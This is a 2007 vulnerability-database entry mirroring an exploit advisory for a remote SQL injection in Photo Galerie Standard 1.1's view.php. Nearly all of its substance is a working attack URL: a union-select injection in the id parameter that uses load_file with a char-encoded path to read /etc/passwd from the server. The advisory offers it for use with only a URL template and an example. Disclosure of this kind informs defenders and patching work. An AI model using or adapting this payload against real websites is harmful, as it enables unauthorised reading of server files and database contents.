Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15957
HistoryFeb 03, 2007 - 12:00 a.m.

Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

2007-02-0300:00:00
vulners.com
27

Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://noname-media.com

$$ : Free


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//view.php?id=[SQL]

Example:

etc/passwd Read

//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!